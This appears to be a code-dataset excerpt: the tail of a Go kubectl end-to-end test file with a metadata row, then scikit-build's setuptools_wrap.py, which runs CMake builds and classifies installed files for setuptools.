return bytes.NewReader(data)
}
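// forEachReplicationController polls until replication controllers matching selectorKey=selectorValue appear in ns, then invokes fn on each; the test fails if none are found in time.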
func forEachReplicationController(c clientset.Interface, ns, selectorKey, selectorValue string, fn func(v1.ReplicationController)) {
var rcs *v1.ReplicationControllerList
var err error
for t := time.Now(); time.Since(t) < framework.PodListTimeout; time.Sleep(framework.Poll) {
label := labels.SelectorFromSet(labels.Set(map[string]string{selectorKey: selectorValue}))
options := metav1.ListOptions{LabelSelector: label.String()}
rcs, err = c.CoreV1().ReplicationControllers(ns).List(options)
Expect(err).NotTo(HaveOccurred())
if len(rcs.Items) > 0 {
break
}
}
if rcs == nil || len(rcs.Items) == 0 {
framework.Failf("No replication controllers found")
}
for _, rc := range rcs.Items {
fn(rc)
}
}
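// validateReplicationControllerConfiguration verifies that the redis-master RC carries the last-applied-configuration annotation and the applyTestLabel value added by the apply test.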
func validateReplicationControllerConfiguration(rc v1.ReplicationController) {
if rc.Name == "redis-master" {
if _, ok := rc.Annotations[v1.LastAppliedConfigAnnotation]; !ok {
framework.Failf("Annotation not found in modified configuration:\n%v\n", rc)
}
if value, ok := rc.Labels[applyTestLabel]; !ok || value != "ADDED" {
framework.Failf("Added label %s not found in modified configuration:\n%v\n", applyTestLabel, rc)
}
}
}
// getUDData creates a validator function based on the expected image name (e.g. kitten.jpg).
// The returned validator fetches data.json from the container via the API server proxy and
// verifies that the image field it serves contains the expected name.
func getUDData(jpgExpected string, ns string) func(clientset.Interface, string) error {
// getUDData validates data.json in the update-demo (returns nil if data is ok).
return func(c clientset.Interface, podID string) error {
framework.Logf("validating pod %s", podID)
ctx, cancel := context.WithTimeout(context.Background(), framework.SingleCallTimeout)
defer cancel()
body, err := c.CoreV1().RESTClient().Get().
Namespace(ns).
Resource("pods").
SubResource("proxy").
Name(podID).
Suffix("data.json").
Do().
Raw()
if err != nil {
if ctx.Err() != nil {
framework.Failf("Failed to retrieve data from container: %v", err)
}
return err
}
framework.Logf("got data: %s", body)
var data updateDemoData
if err := json.Unmarshal(body, &data); err != nil {
return err
}
framework.Logf("Unmarshalled json jpg/img => %s , expecting %s .", data, jpgExpected)
if strings.Contains(data.Image, jpgExpected) {
return nil
} else {
return fmt.Errorf("data served up in container is inaccurate, %s didn't contain %s", data, jpgExpected)
}
}
}
func noOpValidatorFn(c clientset.Interface, podID string) error { return nil }
// newBlockingReader returns a reader that allows reading the given string,
// then blocks until Close() is called on the returned closer.
//
// We're explicitly returning the reader and closer separately, because
// the closer needs to be the *os.File we get from os.Pipe(). This is required
// so the exec of kubectl can pass the underlying file descriptor to the exec
// syscall, instead of creating another os.Pipe and blocking on the io.Copy
// between the source (e.g. stdin) and the write half of the pipe.
func newBlockingReader(s string) (io.Reader, io.Closer, error) {
r, w, err := os.Pipe()
if err != nil {
return nil, nil, err
}
w.Write([]byte(s))
return r, w, nil
}
func startLocalProxy() (srv *httptest.Server, logs *bytes.Buffer) {
logs = &bytes.Buffer{}
p := goproxy.NewProxyHttpServer()
p.Verbose = true
p.Logger = log.New(logs, "", 0)
return httptest.NewServer(p), logs
}
| [
"\"HOME\""
]
| []
| [
"HOME"
]
| [] | ["HOME"] | go | 1 | 0 | |
skbuild/setuptools_wrap.py | """This module provides functionality for wrapping key infrastructure components
from distutils and setuptools.
"""
from __future__ import print_function
import argparse
import copy
import json
import os
import os.path
import platform
import stat
import sys
import warnings
from contextlib import contextmanager
# pylint: disable-next=wrong-import-order
from distutils.errors import DistutilsArgError, DistutilsError, DistutilsGetoptError
from glob import glob
from shutil import copyfile, copymode
# Must be imported before distutils
import setuptools
if sys.version_info >= (3, 0):
from io import StringIO
else:
from StringIO import StringIO
if sys.version_info >= (3, 3):
from shutil import which
else:
from .compat import which
from packaging.requirements import Requirement
from packaging.version import parse as parse_version
from setuptools.dist import Distribution as upstream_Distribution
from . import cmaker
from .command import (
bdist,
bdist_wheel,
build,
build_ext,
build_py,
clean,
egg_info,
generate_source_manifest,
install,
install_lib,
install_scripts,
sdist,
test,
)
from .constants import (
CMAKE_DEFAULT_EXECUTABLE,
CMAKE_INSTALL_DIR,
CMAKE_SPEC_FILE,
set_skbuild_plat_name,
skbuild_plat_name,
)
from .exceptions import SKBuildError, SKBuildGeneratorNotFoundError
from .utils import (
PythonModuleFinder,
mkdir_p,
parse_manifestin,
to_platform_path,
to_unix_path,
)
def create_skbuild_argparser():
"""Create and return a scikit-build argument parser."""
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
"--build-type", default="Release", metavar="", help="specify the CMake build type (e.g. Debug or Release)"
)
parser.add_argument("-G", "--generator", metavar="", help="specify the CMake build system generator")
parser.add_argument("-j", metavar="N", type=int, dest="jobs", help="allow N build jobs at once")
parser.add_argument("--cmake-executable", default=None, metavar="", help="specify the path to the cmake executable")
parser.add_argument(
"--install-target",
default=None,
metavar="",
help="specify the CMake target performing the install. " "If not provided, uses the target ``install``",
)
parser.add_argument(
"--skip-generator-test",
action="store_true",
help="skip generator test when a generator is explicitly selected using --generator",
)
return parser
def _is_cmake_configure_argument(arg):
"""Return True if ``arg`` is a relevant argument to pass to cmake when configuring a project."""
for cmake_arg in (
"-C", # initial-cache
"-D", # <var>[:<type>]=<value>
):
if arg.startswith(cmake_arg):
return True
return False
def parse_skbuild_args(args, cmake_args, build_tool_args):
"""
Parse arguments in the scikit-build argument set. Convert specified
arguments to proper format and append to cmake_args and build_tool_args.
Returns the tuple ``(remaining arguments, cmake executable, skip_generator_test)``.
"""
parser = create_skbuild_argparser()
# Consider CMake arguments passed as global setuptools options
cmake_args.extend([arg for arg in args if _is_cmake_configure_argument(arg)])
# ... and remove them from the list
args = [arg for arg in args if not _is_cmake_configure_argument(arg)]
namespace, remaining_args = parser.parse_known_args(args)
# Construct CMake argument list
cmake_args.append("-DCMAKE_BUILD_TYPE:STRING=" + namespace.build_type)
if namespace.generator is not None:
cmake_args.extend(["-G", namespace.generator])
# Construct build tool argument list
build_tool_args.extend(["--config", namespace.build_type])
if namespace.jobs is not None:
build_tool_args.extend(["-j", str(namespace.jobs)])
if namespace.install_target is not None:
build_tool_args.extend(["--install-target", namespace.install_target])
if namespace.generator is None and namespace.skip_generator_test is True:
sys.exit("ERROR: Specifying --skip-generator-test requires --generator to also be specified.")
return remaining_args, namespace.cmake_executable, namespace.skip_generator_test
def parse_args():
"""This function parses the command-line arguments ``sys.argv`` and returns
the tuple ``(setuptools_args, cmake_executable, skip_generator_test, cmake_args, build_tool_args)``
where each ``*_args`` element corresponds to a set of arguments separated by ``--``."""
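# Illustrative example (hypothetical flag): for "python setup.py bdist_wheel -- -DSOME_FEATURE:BOOL=ON -- -j4",
# the arguments before the first "--" go to setuptools/scikit-build, the second group is passed to CMake,
# and the last group is passed to the underlying build tool.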
dutils = []
cmake = []
make = []
argsets = [dutils, cmake, make]
i = 0
separator = "--"
for arg in sys.argv:
if arg == separator:
i += 1
if i >= len(argsets):
sys.exit(
'ERROR: Too many "{}" separators provided '
"(expected at most {}).".format(separator, len(argsets) - 1)
)
else:
argsets[i].append(arg)
dutils, cmake_executable, skip_generator_test = parse_skbuild_args(dutils, cmake, make)
return dutils, cmake_executable, skip_generator_test, cmake, make
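# _capture_output temporarily redirects sys.stdout/sys.stderr into StringIO buffers; once the context exits, the yielded two-element list holds the captured text as strings.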
@contextmanager
def _capture_output():
oldout, olderr = sys.stdout, sys.stderr
try:
out = [StringIO(), StringIO()]
sys.stdout, sys.stderr = out
yield out
finally:
sys.stdout, sys.stderr = oldout, olderr
out[0] = out[0].getvalue()
out[1] = out[1].getvalue()
def _parse_setuptools_arguments(setup_attrs):
"""This function instantiates a Distribution object and
parses the command line arguments.
It returns the tuple ``(display_only, help_commands, commands, hide_listing, force_cmake, skip_cmake, plat_name)``
where
- display_only is a boolean indicating if an argument like '--help',
'--help-commands' or '--author' was passed.
- help_commands is a boolean indicating if argument '--help-commands'
was passed.
- commands contains the list of commands that were passed.
- hide_listing is a boolean indicating if the list of files being included
in the distribution is displayed or not.
- force_cmake a boolean indicating that CMake should always be executed.
- skip_cmake is a boolean indicating if the execution of CMake should
explicitly be skipped.
- plat_name is a string identifying the platform name to embed in generated
filenames. It defaults to :func:`skbuild.constants.skbuild_plat_name()`.
- build_ext_inplace is a boolean indicating if ``build_ext`` command was
specified along with the --inplace argument.
Otherwise it raises a DistutilsArgError exception if there is any
error on the command-line, and it raises DistutilsGetoptError
if there is any error in the command 'options' attribute.
The code has been adapted from the setup() function available
in distutils/core.py.
"""
setup_attrs = dict(setup_attrs)
setup_attrs["script_name"] = os.path.basename(sys.argv[0])
dist = upstream_Distribution(setup_attrs)
# Update class attribute to also ensure the argument is processed
# when ``setuptools.setup`` is called.
upstream_Distribution.global_options.extend(
[
("hide-listing", None, "do not display list of files being " "included in the distribution"),
("force-cmake", None, "always run CMake"),
("skip-cmake", None, "do not run CMake"),
]
)
# Find and parse the config file(s): they will override options from
# the setup script, but be overridden by the command line.
dist.parse_config_files()
# Parse the command line and override config files; any
# command-line errors are the end user's fault, so turn them into
# SystemExit to suppress tracebacks.
with _capture_output():
result = dist.parse_command_line()
display_only = not result
if not hasattr(dist, "hide_listing"):
dist.hide_listing = False
if not hasattr(dist, "force_cmake"):
dist.force_cmake = False
if not hasattr(dist, "skip_cmake"):
dist.skip_cmake = False
plat_names = set()
for cmd in [dist.get_command_obj(command) for command in dist.commands]:
if getattr(cmd, "plat_name", None) is not None:
plat_names.add(cmd.plat_name)
if not plat_names:
plat_names.add(None)
elif len(plat_names) > 1:
raise SKBuildError("--plat-name is ambiguous: %s" % ", ".join(plat_names))
plat_name = list(plat_names)[0]
build_ext_inplace = dist.get_command_obj("build_ext").inplace
return (
display_only,
dist.help_commands,
dist.commands,
dist.hide_listing,
dist.force_cmake,
dist.skip_cmake,
plat_name,
build_ext_inplace,
)
def _check_skbuild_parameters(skbuild_kw):
cmake_install_dir = skbuild_kw["cmake_install_dir"]
if os.path.isabs(cmake_install_dir):
raise SKBuildError(
(
"\n setup parameter 'cmake_install_dir' is set to "
"an absolute path. A relative path is expected.\n"
" Project Root : {}\n"
" CMake Install Directory: {}\n"
).format(os.getcwd(), cmake_install_dir)
)
cmake_source_dir = skbuild_kw["cmake_source_dir"]
if not os.path.exists(os.path.abspath(cmake_source_dir)):
raise SKBuildError(
(
"\n setup parameter 'cmake_source_dir' set to "
"a nonexistent directory.\n"
" Project Root : {}\n"
" CMake Source Directory: {}\n"
).format(os.getcwd(), cmake_source_dir)
)
def strip_package(package_parts, module_file):
"""Given ``package_parts`` (e.g. ``['foo', 'bar']``) and a
``module_file`` (e.g. ``foo/bar/jaz/rock/roll.py``), starting
from the left, this function will strip the parts of the path
matching the package parts and return a new string
(e.g ``jaz/rock/roll.py``).
The function will work as expected for either Windows or Unix-style
``module_file`` and this independently of the platform.
"""
if not package_parts or os.path.isabs(module_file):
return module_file
package = "/".join(package_parts)
module_dir = os.path.dirname(module_file.replace("\\", "/"))
module_dir = module_dir[: len(package)]
return module_file[len(package) + 1 :] if package != "" and module_dir.startswith(package) else module_file
def _package_data_contain_module(module, package_data):
"""Return True if the ``module`` is contained
in the ``package_data``.
``module`` is a tuple of the form
``(package, modulename, module_file)``.
"""
(package, _, module_file) = module
if package not in package_data:
return False
# We need to strip the package because a module entry
# usually looks like this:
#
# ('foo.bar', 'module', 'foo/bar/module.py')
#
# and the entry in package_data would look like this:
#
# {'foo.bar' : ['module.py']}
if strip_package(package.split("."), module_file) in package_data[package]:
return True
return False
def _should_run_cmake(commands, cmake_with_sdist):
"""Return True if at least one command requiring ``cmake`` to run
is found in ``commands``."""
for expected_command in [
"build",
"build_ext",
"develop",
"install",
"install_lib",
"bdist",
"bdist_dumb",
"bdist_egg",
"bdist_rpm",
"bdist_wininst",
"bdist_wheel",
"test",
]:
if expected_command in commands:
return True
if "sdist" in commands and cmake_with_sdist:
return True
return False
def _save_cmake_spec(args):
"""Save the CMake spec to disk"""
# We use JSON here because readability is more important than performance
try:
os.makedirs(os.path.dirname(CMAKE_SPEC_FILE()))
except OSError:
pass
with open(CMAKE_SPEC_FILE(), "w+") as fp:
json.dump(args, fp)
def _load_cmake_spec():
"""Load and return the CMake spec from disk"""
try:
with open(CMAKE_SPEC_FILE()) as fp:
return json.load(fp)
except (OSError, IOError, ValueError):
return None
# pylint:disable=too-many-locals, too-many-branches
def setup(*args, **kw): # noqa: C901
"""This function wraps setup() so that we can run cmake, make,
CMake build, then proceed as usual with setuptools, appending the
CMake-generated output as necessary.
The CMake project is re-configured only if needed. This is achieved by (1) retrieving the environment mapping
associated with the generator set in the ``CMakeCache.txt`` file, (2) saving the CMake configure arguments and
version in :func:`skbuild.constants.CMAKE_SPEC_FILE()`: and (3) re-configuring only if either the generator or
the CMake specs change.
"""
# If any, strip ending slash from each package directory
# Regular setuptools does not support this
# TODO: will become an error in the future
if "package_dir" in kw:
for package, prefix in kw["package_dir"].items():
if prefix.endswith("/"):
msg = "package_dir={{{!r}: {!r}}} ends with a trailing slash, which is not supported by setuptools.".format(
package, prefix
)
warnings.warn(msg, FutureWarning, stacklevel=2)
kw["package_dir"][package] = prefix[:-1]
sys.argv, cmake_executable, skip_generator_test, cmake_args, make_args = parse_args()
# work around https://bugs.python.org/issue1011113
# (patches provided, but no updates since 2014)
cmdclass = kw.get("cmdclass", {})
cmdclass["build"] = cmdclass.get("build", build.build)
cmdclass["build_py"] = cmdclass.get("build_py", build_py.build_py)
cmdclass["build_ext"] = cmdclass.get("build_ext", build_ext.build_ext)
cmdclass["install"] = cmdclass.get("install", install.install)
cmdclass["install_lib"] = cmdclass.get("install_lib", install_lib.install_lib)
cmdclass["install_scripts"] = cmdclass.get("install_scripts", install_scripts.install_scripts)
cmdclass["clean"] = cmdclass.get("clean", clean.clean)
cmdclass["sdist"] = cmdclass.get("sdist", sdist.sdist)
cmdclass["bdist"] = cmdclass.get("bdist", bdist.bdist)
cmdclass["bdist_wheel"] = cmdclass.get("bdist_wheel", bdist_wheel.bdist_wheel)
cmdclass["egg_info"] = cmdclass.get("egg_info", egg_info.egg_info)
cmdclass["generate_source_manifest"] = cmdclass.get(
"generate_source_manifest", generate_source_manifest.generate_source_manifest
)
cmdclass["test"] = cmdclass.get("test", test.test)
kw["cmdclass"] = cmdclass
# Extract setup keywords specific to scikit-build and remove them from kw.
# Removing the keyword from kw needs to be done here; otherwise, the
# following call to _parse_setuptools_arguments would complain about
# unknown setup options.
parameters = {
"cmake_args": [],
"cmake_install_dir": "",
"cmake_source_dir": "",
"cmake_with_sdist": False,
"cmake_languages": ("C", "CXX"),
"cmake_minimum_required_version": None,
"cmake_process_manifest_hook": None,
"cmake_install_target": "install",
}
skbuild_kw = {param: kw.pop(param, value) for param, value in parameters.items()}
# ... and validate them
try:
_check_skbuild_parameters(skbuild_kw)
except SKBuildError as ex:
import traceback # pylint: disable=import-outside-toplevel
print("Traceback (most recent call last):")
traceback.print_tb(sys.exc_info()[2])
print("")
sys.exit(ex)
# Convert source dir to a path relative to the root
# of the project
cmake_source_dir = skbuild_kw["cmake_source_dir"]
if cmake_source_dir == ".":
cmake_source_dir = ""
if os.path.isabs(cmake_source_dir):
cmake_source_dir = os.path.relpath(cmake_source_dir)
# Skip running CMake in the following cases:
# * flag "--skip-cmake" is provided
# * "display only" argument is provided (e.g '--help', '--author', ...)
# * no command-line arguments or invalid ones are provided
# * no command requiring cmake is provided
# * no CMakeLists.txt is found
display_only = has_invalid_arguments = help_commands = False
force_cmake = skip_cmake = False
commands = []
try:
(
display_only,
help_commands,
commands,
hide_listing,
force_cmake,
skip_cmake,
plat_name,
build_ext_inplace,
) = _parse_setuptools_arguments(kw)
except (DistutilsArgError, DistutilsGetoptError):
has_invalid_arguments = True
has_cmakelists = os.path.exists(os.path.join(cmake_source_dir, "CMakeLists.txt"))
if not has_cmakelists:
print("skipping skbuild (no CMakeLists.txt found)")
skip_skbuild = (
display_only
or has_invalid_arguments
or not _should_run_cmake(commands, skbuild_kw["cmake_with_sdist"])
or not has_cmakelists
)
if skip_skbuild and not force_cmake:
if help_commands:
# Prepend scikit-build help. Generate option descriptions using
# argparse.
skbuild_parser = create_skbuild_argparser()
arg_descriptions = [line for line in skbuild_parser.format_help().split("\n") if line.startswith(" ")]
print("scikit-build options:")
print("\n".join(arg_descriptions))
print("")
print('Arguments following a "--" are passed directly to CMake ' "(e.g. -DMY_VAR:BOOL=TRUE).")
print('Arguments following a second "--" are passed directly to ' "the build tool.")
print("")
return setuptools.setup(*args, **kw)
developer_mode = "develop" in commands or "test" in commands or build_ext_inplace
packages = kw.get("packages", [])
package_dir = kw.get("package_dir", {})
package_data = copy.deepcopy(kw.get("package_data", {}))
py_modules = kw.get("py_modules", [])
new_py_modules = {py_module: False for py_module in py_modules}
scripts = kw.get("scripts", [])
new_scripts = {script: False for script in scripts}
data_files = {(parent_dir or "."): set(file_list) for parent_dir, file_list in kw.get("data_files", [])}
# CMake arguments provided through the command line have more weight: when
# CMake is given the same argument multiple times, only the last one is
# considered. Therefore, prepend the arguments provided in the setup() call.
cmake_args = skbuild_kw["cmake_args"] + cmake_args
# Handle cmake_install_target
# get the target (next item after '--install-target') or return '' if no --install-target
cmake_install_target_from_command = next(
(make_args[index + 1] for index, item in enumerate(make_args) if item == "--install-target"), ""
)
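# Hypothetical invocation illustrating the extraction above:
#   python setup.py install -- -- --install-target package
# puts ["--install-target", "package"] into make_args, so the value extracted
# here would be "package".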
cmake_install_target_from_setup = skbuild_kw["cmake_install_target"]
# Setting target from command takes precedence
# cmake_install_target_from_setup has the default 'install',
# so cmake_install_target would never be empty.
if cmake_install_target_from_command:
cmake_install_target = cmake_install_target_from_command
else:
cmake_install_target = cmake_install_target_from_setup
# Parse CMAKE_ARGS
env_cmake_args = os.environ["CMAKE_ARGS"].split() if "CMAKE_ARGS" in os.environ else []
env_cmake_args = [s for s in env_cmake_args if "CMAKE_INSTALL_PREFIX" not in s]
# Using the environment variable CMAKE_ARGS has lower precedence than manual options
cmake_args = env_cmake_args + cmake_args
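# Hypothetical example of the resulting precedence: with CMAKE_ARGS="-DFOO=1" in
# the environment, cmake_args=["-DFOO=2"] in setup(), and a command line ending
# in `-- -DFOO=3`, the combined list is ["-DFOO=1", "-DFOO=2", "-DFOO=3"]; since
# CMake keeps the last occurrence, the command-line value -DFOO=3 wins.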
if sys.platform == "darwin":
# If no ``--plat-name`` argument was passed, set default value.
if plat_name is None:
plat_name = skbuild_plat_name()
(_, version, machine) = plat_name.split("-")
# The loop here allows CMAKE_OSX_* command line arguments to override
# values passed with either the ``--plat-name`` command-line argument
# or the ``cmake_args`` setup option.
for cmake_arg in cmake_args:
if "CMAKE_OSX_DEPLOYMENT_TARGET" in cmake_arg:
version = cmake_arg.split("=")[1]
if "CMAKE_OSX_ARCHITECTURES" in cmake_arg:
machine = cmake_arg.split("=")[1]
if set(machine.split(";")) == {"x86_64", "arm64"}:
machine = "universal2"
set_skbuild_plat_name("macosx-{}-{}".format(version, machine))
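# Hypothetical example of the override loop above: invoking bdist_wheel with
#   --plat-name macosx-10.9-x86_64 -- -DCMAKE_OSX_ARCHITECTURES=x86_64;arm64
# rewrites the machine part to "universal2", i.e. "macosx-10.9-universal2".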
# Set the platform env. variable so that commands (e.g. bdist_wheel)
# use this information. The _PYTHON_HOST_PLATFORM env. variable is
# used by the distutils.util.get_platform() function.
os.environ.setdefault("_PYTHON_HOST_PLATFORM", skbuild_plat_name())
# Set CMAKE_OSX_DEPLOYMENT_TARGET and CMAKE_OSX_ARCHITECTURES if not already
# specified
(_, version, machine) = skbuild_plat_name().split("-")
if not cmaker.has_cmake_cache_arg(cmake_args, "CMAKE_OSX_DEPLOYMENT_TARGET"):
cmake_args.append("-DCMAKE_OSX_DEPLOYMENT_TARGET:STRING=%s" % version)
if not cmaker.has_cmake_cache_arg(cmake_args, "CMAKE_OSX_ARCHITECTURES"):
machine_archs = "x86_64;arm64" if machine == "universal2" else machine
cmake_args.append("-DCMAKE_OSX_ARCHITECTURES:STRING=%s" % machine_archs)
# Install cmake if listed in `setup_requires`
for package in kw.get("setup_requires", []):
if Requirement(package).name == "cmake":
setup_requires = [package]
dist = upstream_Distribution({"setup_requires": setup_requires})
dist.fetch_build_eggs(setup_requires)
# Packages associated with the "setup_requires" keyword are installed in the
# .eggs subdirectory without honoring the setuptools "console_scripts"
# entry_points and without setting the expected executable permissions,
# so we take care of both below.
import cmake # pylint: disable=import-outside-toplevel
for executable in ["cmake", "cpack", "ctest"]:
executable = os.path.join(cmake.CMAKE_BIN_DIR, executable)
if platform.system().lower() == "windows":
executable += ".exe"
st = os.stat(executable)
permissions = st.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod(executable, permissions)
cmake_executable = os.path.join(cmake.CMAKE_BIN_DIR, "cmake")
break
# Languages are used to determine a working generator
cmake_languages = skbuild_kw["cmake_languages"]
try:
if cmake_executable is None:
cmake_executable = CMAKE_DEFAULT_EXECUTABLE
cmkr = cmaker.CMaker(cmake_executable)
if not skip_cmake:
cmake_minimum_required_version = skbuild_kw["cmake_minimum_required_version"]
if cmake_minimum_required_version is not None:
if parse_version(cmkr.cmake_version) < parse_version(cmake_minimum_required_version):
raise SKBuildError(
"CMake version {} or higher is required. CMake version {} is being used".format(
cmake_minimum_required_version, cmkr.cmake_version
)
)
# Used to confirm that the cmake executable is the same, and that the environment
# didn't change
cmake_spec = {
"args": [which(CMAKE_DEFAULT_EXECUTABLE)] + cmake_args,
"version": cmkr.cmake_version,
"environment": {
"PYTHONNOUSERSITE": os.environ.get("PYTHONNOUSERSITE"),
"PYTHONPATH": os.environ.get("PYTHONPATH"),
},
}
# skip the configure step for a cached build
env = cmkr.get_cached_generator_env()
if env is None or cmake_spec != _load_cmake_spec():
env = cmkr.configure(
cmake_args,
skip_generator_test=skip_generator_test,
cmake_source_dir=cmake_source_dir,
cmake_install_dir=skbuild_kw["cmake_install_dir"],
languages=cmake_languages,
)
_save_cmake_spec(cmake_spec)
cmkr.make(make_args, install_target=cmake_install_target, env=env)
except SKBuildGeneratorNotFoundError as ex:
sys.exit(ex)
except SKBuildError as ex:
import traceback # pylint: disable=import-outside-toplevel
print("Traceback (most recent call last):")
traceback.print_tb(sys.exc_info()[2])
print("")
sys.exit(ex)
# If needed, set reasonable defaults for package_dir
for package in packages:
if package not in package_dir:
package_dir[package] = package.replace(".", "/")
if "" in package_dir:
package_dir[package] = to_unix_path(os.path.join(package_dir[""], package_dir[package]))
kw["package_dir"] = package_dir
package_prefixes = _collect_package_prefixes(package_dir, packages)
# This hook enables custom processing of the cmake manifest
cmake_manifest = cmkr.install()
process_manifest = skbuild_kw.get("cmake_process_manifest_hook")
if process_manifest is not None:
if callable(process_manifest):
cmake_manifest = process_manifest(cmake_manifest)
else:
raise SKBuildError("The cmake_process_manifest_hook argument should be callable.")
_classify_installed_files(
cmake_manifest,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
cmake_source_dir,
skbuild_kw["cmake_install_dir"],
)
original_manifestin_data_files = []
if kw.get("include_package_data", False):
original_manifestin_data_files = parse_manifestin(os.path.join(os.getcwd(), "MANIFEST.in"))
for path in original_manifestin_data_files:
_classify_file(
path, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files
)
if developer_mode:
# Copy packages
for package, package_file_list in package_data.items():
for package_file in package_file_list:
package_file = os.path.join(package_dir[package], package_file)
cmake_file = os.path.join(CMAKE_INSTALL_DIR(), package_file)
if os.path.exists(cmake_file):
_copy_file(cmake_file, package_file, hide_listing)
# Copy modules
for py_module in py_modules:
package_file = py_module + ".py"
cmake_file = os.path.join(CMAKE_INSTALL_DIR(), package_file)
if os.path.exists(cmake_file):
_copy_file(cmake_file, package_file, hide_listing)
else:
_consolidate_package_modules(cmake_source_dir, packages, package_dir, py_modules, package_data, hide_listing)
original_package_data = kw.get("package_data", {}).copy()
_consolidate_package_data_files(original_package_data, package_prefixes, hide_listing)
for data_file in original_manifestin_data_files:
dest_data_file = os.path.join(CMAKE_INSTALL_DIR(), data_file)
_copy_file(data_file, dest_data_file, hide_listing)
kw["package_data"] = package_data
kw["package_dir"] = {
package: (
os.path.join(CMAKE_INSTALL_DIR(), prefix)
if os.path.exists(os.path.join(CMAKE_INSTALL_DIR(), prefix))
else prefix
)
for prefix, package in package_prefixes
}
kw["scripts"] = [
os.path.join(CMAKE_INSTALL_DIR(), script) if mask else script for script, mask in new_scripts.items()
]
kw["data_files"] = [(parent_dir, list(file_set)) for parent_dir, file_set in data_files.items()]
if "zip_safe" not in kw:
kw["zip_safe"] = False
# Adapted from espdev/ITKPythonInstaller/setup.py.in
class BinaryDistribution(upstream_Distribution): # pylint: disable=missing-class-docstring
def has_ext_modules(self): # pylint: disable=no-self-use,missing-function-docstring
return has_cmakelists
kw["distclass"] = BinaryDistribution
print("")
return setuptools.setup(*args, **kw)
def _collect_package_prefixes(package_dir, packages):
"""
Collect the list of prefixes for all packages
The list is used to match paths in the install manifest to packages
specified in the setup.py script.
The list is sorted in decreasing order of prefix length so that paths are
matched with their immediate parent package, instead of any of that
package's ancestors.
For example, consider the project structure below. Assume that the
setup call was made with a package list featuring "top" and "top.bar", but
not "top.not_a_subpackage".
::
top/ -> top/
__init__.py -> top/__init__.py (parent: top)
foo.py -> top/foo.py (parent: top)
bar/ -> top/bar/ (parent: top)
__init__.py -> top/bar/__init__.py (parent: top.bar)
not_a_subpackage/ -> top/not_a_subpackage/ (parent: top)
data_0.txt -> top/not_a_subpackage/data_0.txt (parent: top)
data_1.txt -> top/not_a_subpackage/data_1.txt (parent: top)
The paths in the generated install manifest are matched to packages
according to the parents indicated on the right. Only packages that are
specified in the setup() call are considered. Because of the sort order,
the data files on the bottom would have been mapped to
"top.not_a_subpackage" instead of "top", proper -- had such a package been
specified.
"""
return list(
sorted(
((package_dir[package].replace(".", "/"), package) for package in packages),
key=lambda tup: len(tup[0]),
reverse=True,
)
)
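# Sketch of the output for the docstring example above (assuming the default
# package_dir mapping): the returned list would be
#   [("top/bar", "top.bar"), ("top", "top")]
# so that "top/bar/__init__.py" matches the longer prefix "top/bar" before it
# can fall back to "top".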
def _classify_installed_files(
install_paths,
package_data,
package_prefixes,
py_modules,
new_py_modules,
scripts,
new_scripts,
data_files,
cmake_source_dir,
_cmake_install_dir,
):
assert not os.path.isabs(cmake_source_dir)
assert cmake_source_dir != "."
install_root = os.path.join(os.getcwd(), CMAKE_INSTALL_DIR())
for path in install_paths:
# if this installed file is not within the project root, complain and
# exit
if not to_platform_path(path).startswith(CMAKE_INSTALL_DIR()):
raise SKBuildError(
(
"\n CMake-installed files must be within the project root.\n"
" Project Root : {}\n"
" Violating File: {}\n"
).format(install_root, to_platform_path(path))
)
# peel off the 'skbuild' prefix
path = to_unix_path(os.path.relpath(path, CMAKE_INSTALL_DIR()))
_classify_file(
path, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files
)
def _classify_file(path, package_data, package_prefixes, py_modules, new_py_modules, scripts, new_scripts, data_files):
found_package = False
found_module = False
found_script = False
path = to_unix_path(path)
# check to see if path is part of a package
for prefix, package in package_prefixes:
if path.startswith(prefix + "/"):
# peel off the package prefix
path = to_unix_path(os.path.relpath(path, prefix))
package_file_list = package_data.get(package, [])
package_file_list.append(path)
package_data[package] = package_file_list
found_package = True
break
if found_package:
return
# If control reaches this point, then this installed file is not part of
# a package.
# check if path is a module
for module in py_modules:
if path.replace("/", ".") == ".".join((module, "py")):
new_py_modules[module] = True
found_module = True
break
if found_module:
return
# If control reaches this point, then this installed file is not a
# module
# if the file is a script, mark the corresponding script
for script in scripts:
if path == script:
new_scripts[script] = True
found_script = True
break
if found_script:
return
# If control reaches this point, then this installed file is not a
# script
# If control reaches this point, then we have installed files that are
# not part of a package, not a module, nor a script. Without any other
# information, we can only treat it as a generic data file.
parent_dir = os.path.dirname(path)
file_set = data_files.get(parent_dir)
if file_set is None:
file_set = set()
data_files[parent_dir] = file_set
file_set.add(os.path.join(CMAKE_INSTALL_DIR(), path))
def _copy_file(src_file, dest_file, hide_listing=True):
"""Copy ``src_file`` to ``dest_file`` ensuring parent directory exists.
Messages like `creating directory /path/to/package` and
`copying directory /src/path/to/package -> path/to/package` are displayed
on standard output when ``hide_listing`` is set to False; with the default
(``hide_listing=True``) these messages are suppressed.
"""
# Create directory if needed
dest_dir = os.path.dirname(dest_file)
if dest_dir != "" and not os.path.exists(dest_dir):
if not hide_listing:
print("creating directory {}".format(dest_dir))
mkdir_p(dest_dir)
# Copy file
if not hide_listing:
print("copying {} -> {}".format(src_file, dest_file))
copyfile(src_file, dest_file)
copymode(src_file, dest_file)
def _consolidate_package_modules(cmake_source_dir, packages, package_dir, py_modules, package_data, hide_listing):
"""This function consolidates packages having modules located in
both the source tree and the CMake install tree into one location.
The one location is the CMake install tree
(see :func:`.constants.CMAKE_INSTALL_DIR()`).
Why? This is a necessary evil because ``Setuptools`` keeps track of the
package and module files to install using a dictionary of lists where
the keys are package names (e.g. ``foo.bar``) and the values are lists of
module files (e.g. ``['__init__.py', 'baz.py']``). Since this doesn't allow
files associated with a given package to be "split" across multiple
locations, one location is selected, and files are copied over.
How? It currently searches for modules across both locations using
the :class:`.utils.PythonModuleFinder`. Then, with the help
of :func:`_package_data_contain_module`, it identifies which
ones are already included and which are missing from the distribution.
Once a module has been identified as ``missing``, it is both copied
into the :func:`.constants.CMAKE_INSTALL_DIR()` and added to the
``package_data`` dictionary so that it can be considered by
the upstream setup function.
"""
try:
# Search for python modules in both the current directory
# and cmake install tree.
modules = PythonModuleFinder(
packages, package_dir, py_modules, alternative_build_base=CMAKE_INSTALL_DIR()
).find_all_modules()
except DistutilsError as msg:
